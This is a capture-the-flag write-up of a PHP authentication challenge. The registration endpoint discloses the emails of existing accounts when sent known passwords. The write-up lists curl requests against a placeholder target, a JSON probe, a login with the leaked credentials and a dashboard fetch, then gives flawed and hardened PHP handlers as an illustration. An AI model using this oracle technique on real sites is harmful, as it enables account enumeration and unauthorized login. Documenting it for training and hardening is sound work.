ChefVault: La recette secrete 1

ChefVault la recette secrete 1 · Apr 08, 2026

Summary

ChefVault was a PHP web authentication challenge. The solve used the registration endpoint as a password oracle to discover valid credentials, then logged in and read the authenticated dashboard content.

Evidence

  • register.php accepted JSON input with email and password fields.
  • Supplying specific existing password values leaked existing account emails.
  • The leaked account credential successfully authenticated and redirected to dashboard.php.
  • The dashboard displayed the first challenge flag for an authenticated user role.

Steps

  1. Fetch the login and registration pages to identify the request shape.

      curl -sS -i "http://<TARGET_IP>:1337/"
      curl -sS -i "http://<TARGET_IP>:1337/register.php"

  2. Fuzz register.php with JSON values. The important behavior was that known password values caused the backend to leak associated emails.

      POST /register.php HTTP/1.1
      Host: <TARGET_IP>:1337
      Content-Type: application/json

      {"email":"probe@example.com","password":"<KNOWN_PASSWORD>"}

  3. Use the leaked credentials to log in.

      curl -sS -i -c /tmp/chef_admin.cookies \
        -X POST "http://<TARGET_IP>:1337/index.php" \
        --data "email=<LEAKED_EMAIL>&password=<LEAKED_PASSWORD>"

  4. Fetch the dashboard with the authenticated cookie.

      curl -sS -i -b /tmp/chef_admin.cookies \
        "http://<TARGET_IP>:1337/dashboard.php"

Flag

Recovered, but redacted in the local notes as UQAC{[REDACTED]}.

Notes

The root cause was a registration/password uniqueness oracle that disclosed existing account emails. No JWT role escalation was required for the first flag.
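
The root cause and its fix, side by side, as an added example rather than the challenge's own source code. The function names `register_flawed` and `register_hardened`, the in-memory user arrays, the status codes and all sample values are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical handlers, not the challenge's source code.
// Constructed sample accounts. The flawed store keeps comparable passwords,
// the hardened store keeps salted hashes.
$plainUsers  = ['chef@example.test' => 'constructed-password-1'];
$hashedUsers = ['chef@example.test' => password_hash('constructed-password-1', PASSWORD_DEFAULT)];

// Flawed pattern, assumed from the behaviour in the notes: a password
// "uniqueness" check that tells the caller which account owns the password.
function register_flawed(array &$users, string $email, string $password): array {
    $owner = array_search($password, $users, true);
    if ($owner !== false) {
        return ['status' => 409, 'error' => "Password already used by $owner"];
    }
    $users[$email] = $password;
    return ['status' => 201, 'message' => 'Account created'];
}

// Hardened pattern: no cross-account password comparison is possible because
// each hash has its own salt, and the response does not depend on whether the
// email is already registered.
function register_hardened(array &$users, string $email, string $password): array {
    if (!filter_var($email, FILTER_VALIDATE_EMAIL) || strlen($password) < 12) {
        return ['status' => 400, 'error' => 'Invalid email or password format'];
    }
    // Hash before the existence check so both paths cost the same time.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    if (!isset($users[$email])) {
        $users[$email] = $hash;
    }
    // An existing account is left untouched; a real system would notify its
    // owner by email instead of telling the requester.
    return ['status' => 202, 'message' => 'If the address is eligible, a confirmation email will be sent'];
}

// Same probe as in step 2: a new email paired with a password already in use.
$probe = ['probe@example.com', 'constructed-password-1'];
echo json_encode(register_flawed($plainUsers, ...$probe)), PHP_EOL;
echo json_encode(register_hardened($hashedUsers, ...$probe)), PHP_EOL;
// Registering an existing email yields the same body as a fresh registration.
echo json_encode(register_hardened($hashedUsers, 'chef@example.test', 'another-constructed-pw')), PHP_EOL;
```

Rate limiting on the registration endpoint is still needed alongside the uniform response, since the hardened handler performs a full password hash on every request.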